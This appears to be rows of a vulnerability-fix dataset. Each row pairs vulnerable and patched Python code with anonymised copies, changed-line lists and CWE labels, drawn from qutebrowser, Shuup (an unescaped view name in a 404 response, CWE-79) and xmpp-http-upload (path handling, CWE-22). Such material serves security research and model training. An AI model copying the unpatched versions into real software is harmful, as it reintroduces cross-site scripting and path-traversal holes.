'file': filescheme.handler,
}
self._set_cookiejar()
self._set_cache()
self.sslErrors.connect(self.on_ssl_errors)
self._rejected_ssl_errors = collections.defaultdict(list)
self._accepted_ssl_errors = collections.defaultdict(list)
self.authenticationRequired.connect(self.on_authentication_required)
self.proxyAuthenticationRequired.connect(
self.on_proxy_authentication_required)
self.netrc_used = False
def FUNC_2(self):
if self._private:
VAR_36 = objreg.get('ram-cookie-jar')
else:
VAR_36 = objreg.get('cookie-jar')
self.setCookieJar(VAR_36)
VAR_26 = QCoreApplication.instance()
VAR_36.setParent(VAR_26)
def FUNC_3(self):
if self._private:
return
VAR_26 = QCoreApplication.instance()
VAR_27 = objreg.get('cache')
self.setCache(VAR_27)
cache.setParent(VAR_26)
def FUNC_4(self, VAR_15=None):
VAR_28 = [self.shutting_down]
if VAR_15 is not None:
VAR_28.append(VAR_15.destroyed)
if self._tab_id is not None:
assert self._win_id is not None
VAR_37 = objreg.get('tab', scope='tab', window=self._win_id,
VAR_37=self._tab_id)
VAR_28.append(VAR_37.load_started)
return VAR_28
def FUNC_5(self):
self.setNetworkAccessible(QNetworkAccessManager.NotAccessible)
self.shutting_down.emit()
def FUNC_6(self, VAR_16, VAR_17): # noqa: C901 pragma: no mccabe
VAR_17 = [certificateerror.CertificateErrorWrapper(e) for e in VAR_17]
log.webview.debug("Certificate VAR_17: {!r}".format(
' / '.join(str(err) for err in VAR_17)))
try:
VAR_38 = urlutils.host_tuple(VAR_16.url())
except ValueError:
VAR_38 = None
VAR_39 = False
VAR_40 = False
else:
VAR_39 = set(VAR_17).issubset(
self._accepted_ssl_errors[VAR_38])
VAR_40 = set(VAR_17).issubset(
self._rejected_ssl_errors[VAR_38])
log.webview.debug("Already accepted: {} / "
"rejected {}".format(VAR_39, VAR_40))
if VAR_40:
return
elif VAR_39:
VAR_16.ignoreSslErrors()
return
VAR_28 = self._get_abort_signals(VAR_16)
VAR_29 = shared.ignore_certificate_errors(VAR_16.url(), VAR_17,
VAR_28=abort_on)
if VAR_29:
VAR_16.ignoreSslErrors()
VAR_41 = self._accepted_ssl_errors
else:
VAR_41 = self._rejected_ssl_errors
if VAR_38 is not None:
VAR_41[VAR_38] += VAR_17
def FUNC_7(self):
self._accepted_ssl_errors.clear()
self._rejected_ssl_errors.clear()
@pyqtSlot(QUrl)
def FUNC_8(self, VAR_18):
try:
del self._rejected_ssl_errors[VAR_18]
except KeyError:
pass
@pyqtSlot('QNetworkReply*', 'QAuthenticator*')
def FUNC_9(self, VAR_16, VAR_19):
VAR_30 = False
if not self.netrc_used:
self.netrc_used = True
VAR_30 = shared.netrc_authentication(VAR_16.url(),
VAR_19)
if not VAR_30:
VAR_28 = self._get_abort_signals(VAR_16)
shared.authentication_required(VAR_16.url(), VAR_19,
VAR_28=abort_on)
@pyqtSlot('QNetworkProxy', 'QAuthenticator*')
def FUNC_10(self, VAR_20, VAR_19):
VAR_31 = CLASS_0(VAR_20.type(), VAR_20.hostName(), VAR_20.port())
if VAR_31 in VAR_1:
VAR_42, VAR_43 = VAR_1[VAR_31]
VAR_19.setUser(VAR_42)
VAR_19.setPassword(VAR_43)
else:
VAR_44 = '<b>{}</b> says:<br/>{}'.format(
html.escape(VAR_20.hostName()),
html.escape(VAR_19.realm()))
VAR_28 = self._get_abort_signals()
VAR_45 = message.ask(
title="Proxy authentication required", text=VAR_44,
mode=usertypes.PromptMode.user_pwd, VAR_28=abort_on)
if VAR_45 is not None:
VAR_19.setUser(VAR_45.user)
VAR_19.setPassword(VAR_45.password)
VAR_1[VAR_31] = VAR_45
@pyqtSlot()
def FUNC_11(self):
self.adopted_downloads -= 1
log.downloads.debug("Adopted VAR_21 destroyed, {} left.".format(
self.adopted_downloads))
assert self.adopted_downloads >= 0
if self.adopted_downloads == 0:
self.deleteLater()
@pyqtSlot(object) # DownloadItem
def FUNC_12(self, VAR_21):
self.adopted_downloads += 1
log.downloads.debug("Adopted VAR_21, {} adopted.".format(
self.adopted_downloads))
VAR_21.destroyed.connect(self.on_adopted_download_destroyed)
VAR_21.adopt_download.connect(self.adopt_download)
def FUNC_13(self, VAR_22, VAR_23):
VAR_32 = config.val.content.headers.referer
try:
if VAR_32 == 'never':
VAR_22.setRawHeader('Referer'.encode('ascii'), QByteArray())
elif (VAR_32 == 'same-domain' and
not urlutils.same_domain(VAR_22.url(), VAR_23)):
VAR_22.setRawHeader('Referer'.encode('ascii'), QByteArray())
except urlutils.InvalidUrlError:
pass
@utils.prevent_exceptions(False)
def FUNC_14(self, VAR_24, VAR_22, VAR_25):
VAR_33 = objreg.get('proxy-factory', None)
if VAR_33 is not None:
VAR_46 = VAR_33.get_error()
if VAR_46 is not None:
return networkreply.ErrorNetworkReply(
VAR_22, VAR_46, QNetworkReply.UnknownProxyError,
self)
VAR_34 = VAR_22.url().scheme()
if VAR_34 in self._scheme_handlers:
VAR_47 = self._scheme_handlers[VAR_34](VAR_22)
if VAR_47 is not None:
VAR_47.setParent(self)
return VAR_47
for header, value in shared.custom_headers(VAR_18=VAR_22.url()):
VAR_22.setRawHeader(header, value)
VAR_35 = objreg.get('host-blocker')
if VAR_35.is_blocked(VAR_22.url()):
log.webview.info("Request to {} blocked by host blocker.".format(
VAR_22.url().host()))
return networkreply.ErrorNetworkReply(
VAR_22, VAR_0, QNetworkReply.ContentAccessDenied,
self)
VAR_23 = QUrl()
if self._tab_id is not None:
assert self._win_id is not None
try:
VAR_37 = objreg.get('tab', scope='tab', window=self._win_id,
VAR_37=self._tab_id)
VAR_23 = VAR_37.url()
except (KeyError, RuntimeError):
VAR_23 = QUrl()
if 'log-requests' in self._args.debug_flags:
VAR_48 = debug.qenum_key(QNetworkAccessManager, VAR_24)
VAR_48 = operation.replace('Operation', '').upper()
log.webview.debug("{} {}, first-party {}".format(
VAR_48,
VAR_22.url().toDisplayString(),
VAR_23.toDisplayString()))
self.set_referer(VAR_22, VAR_23)
return super().createRequest(VAR_24, VAR_22, VAR_25)
|
import collections
import html
import attr
from PyQt5.QtCore import (pyqtSlot, pyqtSignal, QCoreApplication, QUrl,
QByteArray)
from PyQt5.QtNetwork import QNetworkAccessManager, QNetworkReply, QSslSocket
from qutebrowser.config import config
from qutebrowser.utils import (message, log, usertypes, utils, objreg,
urlutils, debug)
from qutebrowser.browser import shared
from qutebrowser.browser.webkit import certificateerror
from qutebrowser.browser.webkit.network import (webkitqutescheme, networkreply,
filescheme)
VAR_0 = '%HOSTBLOCK%'
VAR_1 = {}
@attr.s(frozen=True)
class CLASS_0:
VAR_3 = attr.ib()
VAR_4 = attr.ib()
VAR_5 = attr.ib()
def FUNC_0(VAR_2):
VAR_6 = [e.upper() for e in VAR_2.name().split('-')]
if VAR_2.usedBits() < 128:
return False
elif VAR_2.keyExchangeMethod() == 'DH' and utils.is_windows:
return False
elif VAR_2.encryptionMethod().upper().startswith('RC4'):
return False
elif VAR_2.encryptionMethod().upper().startswith('DES'):
return False
elif 'MD5' in VAR_6:
return False
elif VAR_2.authenticationMethod() in ['aNULL', 'NULL']:
return False
elif VAR_2.encryptionMethod() in ['eNULL', 'NULL']:
return False
elif 'EXP' in VAR_6 or 'EXPORT' in VAR_6:
return False
elif 'ADH' in VAR_6:
return False
else:
return True
def FUNC_1():
VAR_7 = QSslSocket.defaultCiphers()
log.init.debug("Default Qt ciphers: {}".format(
', '.join(c.name() for c in VAR_7)))
VAR_8 = []
VAR_9 = []
for VAR_2 in VAR_7:
if FUNC_0(VAR_2):
VAR_8.append(VAR_2)
else:
VAR_9.append(VAR_2)
log.init.debug("Disabling bad ciphers: {}".format(
', '.join(c.name() for c in VAR_9)))
QSslSocket.setDefaultCiphers(VAR_8)
class CLASS_1(QNetworkAccessManager):
VAR_10 = pyqtSignal()
def __init__(self, *, VAR_11, VAR_12, VAR_13, VAR_14=None):
log.init.debug("Initializing NetworkManager")
with log.disable_qt_msghandler():
super().__init__(VAR_14)
log.init.debug("NetworkManager FUNC_1 done")
self.adopted_downloads = 0
self._args = objreg.get('args')
self._win_id = VAR_11
self._tab_id = VAR_12
self._private = VAR_13
self._scheme_handlers = {
'qute': webkitqutescheme.handler,
'file': filescheme.handler,
}
self._set_cookiejar()
self._set_cache()
self.sslErrors.connect(self.on_ssl_errors)
self._rejected_ssl_errors = collections.defaultdict(list)
self._accepted_ssl_errors = collections.defaultdict(list)
self.authenticationRequired.connect(self.on_authentication_required)
self.proxyAuthenticationRequired.connect(
self.on_proxy_authentication_required)
self.netrc_used = False
def FUNC_2(self):
if self._private:
VAR_36 = objreg.get('ram-cookie-jar')
else:
VAR_36 = objreg.get('cookie-jar')
self.setCookieJar(VAR_36)
VAR_26 = QCoreApplication.instance()
VAR_36.setParent(VAR_26)
def FUNC_3(self):
if self._private:
return
VAR_26 = QCoreApplication.instance()
VAR_27 = objreg.get('cache')
self.setCache(VAR_27)
cache.setParent(VAR_26)
def FUNC_4(self, VAR_15=None):
VAR_28 = [self.shutting_down]
if VAR_15 is not None:
VAR_28.append(VAR_15.destroyed)
if self._tab_id is not None:
assert self._win_id is not None
VAR_37 = objreg.get('tab', scope='tab', window=self._win_id,
VAR_37=self._tab_id)
VAR_28.append(VAR_37.load_started)
return VAR_28
def FUNC_5(self):
self.setNetworkAccessible(QNetworkAccessManager.NotAccessible)
self.shutting_down.emit()
def FUNC_6(self, VAR_16, VAR_17): # noqa: C901 pragma: no mccabe
VAR_17 = [certificateerror.CertificateErrorWrapper(e) for e in VAR_17]
log.webview.debug("Certificate VAR_17: {!r}".format(
' / '.join(str(err) for err in VAR_17)))
try:
VAR_38 = urlutils.host_tuple(VAR_16.url())
except ValueError:
VAR_38 = None
VAR_39 = False
VAR_40 = False
else:
VAR_39 = set(VAR_17).issubset(
self._accepted_ssl_errors[VAR_38])
VAR_40 = set(VAR_17).issubset(
self._rejected_ssl_errors[VAR_38])
log.webview.debug("Already accepted: {} / "
"rejected {}".format(VAR_39, VAR_40))
if VAR_40:
return
elif VAR_39:
VAR_16.ignoreSslErrors()
return
VAR_28 = self._get_abort_signals(VAR_16)
VAR_29 = shared.ignore_certificate_errors(VAR_16.url(), VAR_17,
VAR_28=abort_on)
if VAR_29:
VAR_16.ignoreSslErrors()
VAR_41 = self._accepted_ssl_errors
else:
VAR_41 = self._rejected_ssl_errors
if VAR_38 is not None:
VAR_41[VAR_38] += VAR_17
def FUNC_7(self):
self._accepted_ssl_errors.clear()
self._rejected_ssl_errors.clear()
@pyqtSlot(QUrl)
def FUNC_8(self, VAR_18):
try:
del self._rejected_ssl_errors[VAR_18]
except KeyError:
pass
@pyqtSlot('QNetworkReply*', 'QAuthenticator*')
def FUNC_9(self, VAR_16, VAR_19):
VAR_30 = False
if not self.netrc_used:
self.netrc_used = True
VAR_30 = shared.netrc_authentication(VAR_16.url(),
VAR_19)
if not VAR_30:
VAR_28 = self._get_abort_signals(VAR_16)
shared.authentication_required(VAR_16.url(), VAR_19,
VAR_28=abort_on)
@pyqtSlot('QNetworkProxy', 'QAuthenticator*')
def FUNC_10(self, VAR_20, VAR_19):
VAR_31 = CLASS_0(VAR_20.type(), VAR_20.hostName(), VAR_20.port())
if VAR_31 in VAR_1:
VAR_42, VAR_43 = VAR_1[VAR_31]
VAR_19.setUser(VAR_42)
VAR_19.setPassword(VAR_43)
else:
VAR_44 = '<b>{}</b> says:<br/>{}'.format(
html.escape(VAR_20.hostName()),
html.escape(VAR_19.realm()))
VAR_28 = self._get_abort_signals()
VAR_45 = message.ask(
title="Proxy authentication required", text=VAR_44,
mode=usertypes.PromptMode.user_pwd, VAR_28=abort_on)
if VAR_45 is not None:
VAR_19.setUser(VAR_45.user)
VAR_19.setPassword(VAR_45.password)
VAR_1[VAR_31] = VAR_45
@pyqtSlot()
def FUNC_11(self):
self.adopted_downloads -= 1
log.downloads.debug("Adopted VAR_21 destroyed, {} left.".format(
self.adopted_downloads))
assert self.adopted_downloads >= 0
if self.adopted_downloads == 0:
self.deleteLater()
@pyqtSlot(object) # DownloadItem
def FUNC_12(self, VAR_21):
self.adopted_downloads += 1
log.downloads.debug("Adopted VAR_21, {} adopted.".format(
self.adopted_downloads))
VAR_21.destroyed.connect(self.on_adopted_download_destroyed)
VAR_21.adopt_download.connect(self.adopt_download)
def FUNC_13(self, VAR_22, VAR_23):
VAR_32 = config.val.content.headers.referer
try:
if VAR_32 == 'never':
VAR_22.setRawHeader('Referer'.encode('ascii'), QByteArray())
elif (VAR_32 == 'same-domain' and
not urlutils.same_domain(VAR_22.url(), VAR_23)):
VAR_22.setRawHeader('Referer'.encode('ascii'), QByteArray())
except urlutils.InvalidUrlError:
pass
@utils.prevent_exceptions(False)
def FUNC_14(self, VAR_24, VAR_22, VAR_25):
VAR_33 = objreg.get('proxy-factory', None)
if VAR_33 is not None:
VAR_46 = VAR_33.get_error()
if VAR_46 is not None:
return networkreply.ErrorNetworkReply(
VAR_22, VAR_46, QNetworkReply.UnknownProxyError,
self)
for header, value in shared.custom_headers(VAR_18=VAR_22.url()):
VAR_22.setRawHeader(header, value)
VAR_34 = objreg.get('host-blocker')
if VAR_34.is_blocked(VAR_22.url()):
log.webview.info("Request to {} blocked by host blocker.".format(
VAR_22.url().host()))
return networkreply.ErrorNetworkReply(
VAR_22, VAR_0, QNetworkReply.ContentAccessDenied,
self)
VAR_23 = QUrl()
if self._tab_id is not None:
assert self._win_id is not None
try:
VAR_37 = objreg.get('tab', scope='tab', window=self._win_id,
VAR_37=self._tab_id)
VAR_23 = VAR_37.url()
except (KeyError, RuntimeError):
VAR_23 = QUrl()
if 'log-requests' in self._args.debug_flags:
VAR_47 = debug.qenum_key(QNetworkAccessManager, VAR_24)
VAR_47 = operation.replace('Operation', '').upper()
log.webview.debug("{} {}, first-party {}".format(
VAR_47,
VAR_22.url().toDisplayString(),
VAR_23.toDisplayString()))
VAR_35 = VAR_22.url().scheme()
if VAR_35 in self._scheme_handlers:
VAR_48 = self._scheme_handlers[VAR_35](VAR_22, VAR_24, VAR_23)
if VAR_48 is not None:
VAR_48.setParent(self)
return VAR_48
self.set_referer(VAR_22, VAR_23)
return super().createRequest(VAR_24, VAR_22, VAR_25)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
24,
29,
37,
38,
41,
42,
45,
47,
51,
52,
57,
59,
61,
64,
65,
68,
71,
73,
74,
75,
76,
77,
78,
79,
81,
84,
87,
90,
92,
95,
96,
102,
110,
114,
115,
117,
119,
136,
140,
142,
146,
147,
168,
175,
176,
177,
181,
186,
187,
192,
198,
199,
206,
211,
212,
213,
216,
218,
237,
240,
246,
257,
262,
266,
274,
287,
308,
312,
321,
330,
334,
337,
338,
343,
344,
346,
347,
349,
350,
351,
352,
353,
354,
355,
359,
364,
375,
382,
385,
393,
394,
395,
396,
398,
406,
407,
408,
410,
418,
421,
20,
46,
54,
98,
118,
119,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
137,
138,
139,
170,
183,
194,
208,
215,
216,
217,
218,
219,
220,
221,
222,
259,
265,
266,
267,
268,
269,
277,
290,
311,
312,
313,
314,
324,
332,
358,
359,
360,
361,
362,
363,
364,
365,
366,
367
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
24,
29,
37,
38,
41,
42,
45,
47,
51,
52,
57,
59,
61,
64,
65,
68,
71,
73,
74,
75,
76,
77,
78,
79,
81,
84,
87,
90,
92,
95,
96,
102,
110,
114,
115,
117,
119,
136,
140,
142,
146,
147,
168,
175,
176,
177,
181,
186,
187,
192,
198,
199,
206,
211,
212,
213,
216,
218,
237,
240,
246,
257,
262,
266,
274,
287,
308,
312,
321,
330,
334,
337,
338,
343,
344,
346,
347,
349,
350,
351,
352,
353,
354,
355,
359,
364,
375,
378,
386,
387,
388,
389,
391,
399,
400,
401,
403,
411,
418,
421,
20,
46,
54,
98,
118,
119,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
137,
138,
139,
170,
183,
194,
208,
215,
216,
217,
218,
219,
220,
221,
222,
259,
265,
266,
267,
268,
269,
277,
290,
311,
312,
313,
314,
324,
332,
358,
359,
360,
361,
362,
363,
364,
365,
366,
367
] |
1CWE-79
| # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.http.response import HttpResponseNotFound
from shuup.xtheme._theme import get_current_theme
_VIEW_CACHE = {}
def clear_view_cache(**kwargs):
_VIEW_CACHE.clear()
setting_changed.connect(clear_view_cache, dispatch_uid="shuup.xtheme.views.extra.clear_view_cache")
def _get_view_by_name(theme, view_name):
view = theme.get_view(view_name)
if hasattr(view, "as_view"): # Handle CBVs
view = view.as_view()
if view and not callable(view):
raise ImproperlyConfigured("Error! View `%r` is not callable." % view)
return view
def get_view_by_name(theme, view_name):
if not theme:
return None
cache_key = (theme.identifier, view_name)
if cache_key not in _VIEW_CACHE:
view = _get_view_by_name(theme, view_name)
_VIEW_CACHE[cache_key] = view
else:
view = _VIEW_CACHE[cache_key]
return view
def extra_view_dispatch(request, view):
"""
Dispatch to an Xtheme extra view.
:param request: A request.
:type request: django.http.HttpRequest
:param view: View name.
:type view: str
:return: A response of some kind.
:rtype: django.http.HttpResponse
"""
theme = getattr(request, "theme", None) or get_current_theme(request.shop)
view_func = get_view_by_name(theme, view)
if not view_func:
msg = "Error! %s/%s: Not found." % (getattr(theme, "identifier", None), view)
return HttpResponseNotFound(msg)
return view_func(request)
| # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.http.response import HttpResponseNotFound
from django.utils.html import escape
from shuup.xtheme._theme import get_current_theme
_VIEW_CACHE = {}
def clear_view_cache(**kwargs):
_VIEW_CACHE.clear()
setting_changed.connect(clear_view_cache, dispatch_uid="shuup.xtheme.views.extra.clear_view_cache")
def _get_view_by_name(theme, view_name):
view = theme.get_view(view_name)
if hasattr(view, "as_view"): # Handle CBVs
view = view.as_view()
if view and not callable(view):
raise ImproperlyConfigured("Error! View `%r` is not callable." % view)
return view
def get_view_by_name(theme, view_name):
if not theme:
return None
cache_key = (theme.identifier, view_name)
if cache_key not in _VIEW_CACHE:
view = _get_view_by_name(theme, view_name)
_VIEW_CACHE[cache_key] = view
else:
view = _VIEW_CACHE[cache_key]
return view
def extra_view_dispatch(request, view):
"""
Dispatch to an Xtheme extra view.
:param request: A request.
:type request: django.http.HttpRequest
:param view: View name.
:type view: str
:return: A response of some kind.
:rtype: django.http.HttpResponse
"""
theme = getattr(request, "theme", None) or get_current_theme(request.shop)
view_func = get_view_by_name(theme, view)
if not view_func:
msg = "Error! %s/%s: Not found." % (getattr(theme, "identifier", None), escape(view))
return HttpResponseNotFound(msg)
return view_func(request)
| xss | {
"code": [
" msg = \"Error! %s/%s: Not found.\" % (getattr(theme, \"identifier\", None), view)"
],
"line_no": [
59
]
} | {
"code": [
" msg = \"Error! %s/%s: Not found.\" % (getattr(theme, \"identifier\", None), escape(view))"
],
"line_no": [
60
]
} |
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.http.response import HttpResponseNotFound
from shuup.xtheme._theme import get_current_theme
VAR_0 = {}
def FUNC_0(**VAR_1):
VAR_0.clear()
setting_changed.connect(FUNC_0, dispatch_uid="shuup.xtheme.views.extra.clear_view_cache")
def FUNC_1(VAR_2, VAR_3):
VAR_5 = VAR_2.get_view(VAR_3)
if hasattr(VAR_5, "as_view"): # Handle CBVs
VAR_5 = view.as_view()
if VAR_5 and not callable(VAR_5):
raise ImproperlyConfigured("Error! View `%r` is not callable." % VAR_5)
return VAR_5
def FUNC_2(VAR_2, VAR_3):
if not VAR_2:
return None
VAR_6 = (VAR_2.identifier, VAR_3)
if VAR_6 not in VAR_0:
VAR_5 = FUNC_1(VAR_2, VAR_3)
VAR_0[VAR_6] = VAR_5
else:
VAR_5 = VAR_0[VAR_6]
return VAR_5
def FUNC_3(VAR_4, VAR_5):
VAR_2 = getattr(VAR_4, "theme", None) or get_current_theme(VAR_4.shop)
VAR_7 = FUNC_2(VAR_2, VAR_5)
if not VAR_7:
VAR_8 = "Error! %s/%s: Not found." % (getattr(VAR_2, "identifier", None), VAR_5)
return HttpResponseNotFound(VAR_8)
return VAR_7(VAR_4)
|
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.http.response import HttpResponseNotFound
from django.utils.html import escape
from shuup.xtheme._theme import get_current_theme
VAR_0 = {}
def FUNC_0(**VAR_1):
VAR_0.clear()
setting_changed.connect(FUNC_0, dispatch_uid="shuup.xtheme.views.extra.clear_view_cache")
def FUNC_1(VAR_2, VAR_3):
VAR_5 = VAR_2.get_view(VAR_3)
if hasattr(VAR_5, "as_view"): # Handle CBVs
VAR_5 = view.as_view()
if VAR_5 and not callable(VAR_5):
raise ImproperlyConfigured("Error! View `%r` is not callable." % VAR_5)
return VAR_5
def FUNC_2(VAR_2, VAR_3):
if not VAR_2:
return None
VAR_6 = (VAR_2.identifier, VAR_3)
if VAR_6 not in VAR_0:
VAR_5 = FUNC_1(VAR_2, VAR_3)
VAR_0[VAR_6] = VAR_5
else:
VAR_5 = VAR_0[VAR_6]
return VAR_5
def FUNC_3(VAR_4, VAR_5):
VAR_2 = getattr(VAR_4, "theme", None) or get_current_theme(VAR_4.shop)
VAR_7 = FUNC_2(VAR_2, VAR_5)
if not VAR_7:
VAR_8 = "Error! %s/%s: Not found." % (getattr(VAR_2, "identifier", None), escape(VAR_5))
return HttpResponseNotFound(VAR_8)
return VAR_7(VAR_4)
| [
1,
2,
3,
4,
5,
6,
7,
11,
13,
15,
16,
19,
20,
22,
23,
31,
32,
43,
44,
48,
62,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55
] | [
1,
2,
3,
4,
5,
6,
7,
12,
14,
16,
17,
20,
21,
23,
24,
32,
33,
44,
45,
49,
63,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56
] |
0CWE-22
| ########################################################################
# File name: xhu.py
# This file is part of: xmpp-http-upload
#
# LICENSE
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
########################################################################
import contextlib
import errno
import fnmatch
import json
import hashlib
import hmac
import pathlib
import typing
import flask
app = flask.Flask("xmpp-http-upload")
app.config.from_envvar("XMPP_HTTP_UPLOAD_CONFIG")
application = app
if app.config['ENABLE_CORS']:
from flask_cors import CORS
CORS(app)
def sanitized_join(path: str, root: pathlib.Path) -> pathlib.Path:
result = (root / path).absolute()
if not str(result).startswith(str(root) + "/"):
raise ValueError("resulting path is outside root")
return result
def get_paths(base_path: pathlib.Path):
data_file = pathlib.Path(str(base_path) + ".data")
metadata_file = pathlib.Path(str(base_path) + ".meta")
return data_file, metadata_file
def load_metadata(metadata_file):
with metadata_file.open("r") as f:
return json.load(f)
def get_info(path: str, root: pathlib.Path) -> typing.Tuple[
pathlib.Path,
dict]:
dest_path = sanitized_join(
path,
pathlib.Path(app.config["DATA_ROOT"]),
)
data_file, metadata_file = get_paths(dest_path)
return data_file, load_metadata(metadata_file)
@contextlib.contextmanager
def write_file(at: pathlib.Path):
with at.open("xb") as f:
try:
yield f
except: # NOQA
at.unlink()
raise
@app.route("/")
def index():
return flask.Response(
"Welcome to XMPP HTTP Upload. State your business.",
mimetype="text/plain",
)
def stream_file(src, dest, nbytes):
while nbytes > 0:
data = src.read(min(nbytes, 4096))
if not data:
break
dest.write(data)
nbytes -= len(data)
if nbytes > 0:
raise EOFError
@app.route("/<path:path>", methods=["PUT"])
def put_file(path):
try:
dest_path = sanitized_join(
path,
pathlib.Path(app.config["DATA_ROOT"]),
)
except ValueError:
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
verification_key = flask.request.args.get("v", "")
length = int(flask.request.headers.get("Content-Length", 0))
hmac_input = "{} {}".format(path, length).encode("utf-8")
key = app.config["SECRET_KEY"]
mac = hmac.new(key, hmac_input, hashlib.sha256)
digest = mac.hexdigest()
if not hmac.compare_digest(digest, verification_key):
return flask.Response(
"Invalid verification key",
403,
mimetype="text/plain",
)
content_type = flask.request.headers.get(
"Content-Type",
"application/octet-stream",
)
dest_path.parent.mkdir(parents=True, exist_ok=True, mode=0o770)
data_file, metadata_file = get_paths(dest_path)
try:
with write_file(data_file) as fout:
stream_file(flask.request.stream, fout, length)
with metadata_file.open("x") as f:
json.dump(
{
"headers": {"Content-Type": content_type},
},
f,
)
except EOFError:
return flask.Response(
"Bad Request",
400,
mimetype="text/plain",
)
except OSError as exc:
if exc.errno == errno.EEXIST:
return flask.Response(
"Conflict",
409,
mimetype="text/plain",
)
raise
return flask.Response(
"Created",
201,
mimetype="text/plain",
)
def generate_headers(response_headers, metadata_headers):
for key, value in metadata_headers.items():
response_headers[key] = value
content_type = metadata_headers["Content-Type"]
for mimetype_glob in app.config.get("NON_ATTACHMENT_MIME_TYPES", []):
if fnmatch.fnmatch(content_type, mimetype_glob):
break
else:
response_headers["Content-Disposition"] = "attachment"
response_headers["X-Content-Type-Options"] = "nosniff"
response_headers["X-Frame-Options"] = "DENY"
response_headers["Content-Security-Policy"] = "default-src 'none'; frame-ancestors 'none'; sandbox"
@app.route("/<path:path>", methods=["HEAD"])
def head_file(path):
try:
data_file, metadata = get_info(
path,
pathlib.Path(app.config["DATA_ROOT"])
)
stat = data_file.stat()
except (OSError, ValueError):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
response = flask.Response()
response.headers["Content-Length"] = str(stat.st_size)
generate_headers(
response.headers,
metadata["headers"],
)
return response
@app.route("/<path:path>", methods=["GET"])
def get_file(path):
try:
data_file, metadata = get_info(
path,
pathlib.Path(app.config["DATA_ROOT"])
)
except (OSError, ValueError):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
response = flask.make_response(flask.send_file(
str(data_file),
))
generate_headers(
response.headers,
metadata["headers"],
)
return response
| ########################################################################
# File name: xhu.py
# This file is part of: xmpp-http-upload
#
# LICENSE
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
########################################################################
import contextlib
import errno
import fnmatch
import json
import hashlib
import hmac
import pathlib
import typing
import flask
import werkzeug.exceptions
app = flask.Flask("xmpp-http-upload")
app.config.from_envvar("XMPP_HTTP_UPLOAD_CONFIG")
application = app
if app.config['ENABLE_CORS']:
from flask_cors import CORS
CORS(app)
def get_paths(root: str, sub_path: str) \
-> typing.Tuple[pathlib.Path, pathlib.Path]:
base_path = flask.safe_join(root, sub_path)
data_file = pathlib.Path(base_path + ".data")
metadata_file = pathlib.Path(base_path + ".meta")
return data_file, metadata_file
def load_metadata(metadata_file):
with metadata_file.open("r") as f:
return json.load(f)
def get_info(path: str) -> typing.Tuple[
pathlib.Path,
dict]:
data_file, metadata_file = get_paths(app.config["DATA_ROOT"], path)
return data_file, load_metadata(metadata_file)
@contextlib.contextmanager
def write_file(at: pathlib.Path):
with at.open("xb") as f:
try:
yield f
except: # NOQA
at.unlink()
raise
@app.route("/")
def index():
return flask.Response(
"Welcome to XMPP HTTP Upload. State your business.",
mimetype="text/plain",
)
def stream_file(src, dest, nbytes):
while nbytes > 0:
data = src.read(min(nbytes, 4096))
if not data:
break
dest.write(data)
nbytes -= len(data)
if nbytes > 0:
raise EOFError
@app.route("/<path:path>", methods=["PUT"])
def put_file(path):
try:
data_file, metadata_file = get_paths(app.config["DATA_ROOT"], path)
except werkzeug.exceptions.NotFound:
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
verification_key = flask.request.args.get("v", "")
length = int(flask.request.headers.get("Content-Length", 0))
hmac_input = "{} {}".format(path, length).encode("utf-8")
key = app.config["SECRET_KEY"]
mac = hmac.new(key, hmac_input, hashlib.sha256)
digest = mac.hexdigest()
if not hmac.compare_digest(digest, verification_key):
return flask.Response(
"Invalid verification key",
403,
mimetype="text/plain",
)
content_type = flask.request.headers.get(
"Content-Type",
"application/octet-stream",
)
data_file.parent.mkdir(parents=True, exist_ok=True, mode=0o770)
try:
with write_file(data_file) as fout:
stream_file(flask.request.stream, fout, length)
with metadata_file.open("x") as f:
json.dump(
{
"headers": {"Content-Type": content_type},
},
f,
)
except EOFError:
return flask.Response(
"Bad Request",
400,
mimetype="text/plain",
)
except OSError as exc:
if exc.errno == errno.EEXIST:
return flask.Response(
"Conflict",
409,
mimetype="text/plain",
)
raise
return flask.Response(
"Created",
201,
mimetype="text/plain",
)
def generate_headers(response_headers, metadata_headers):
for key, value in metadata_headers.items():
response_headers[key] = value
content_type = metadata_headers["Content-Type"]
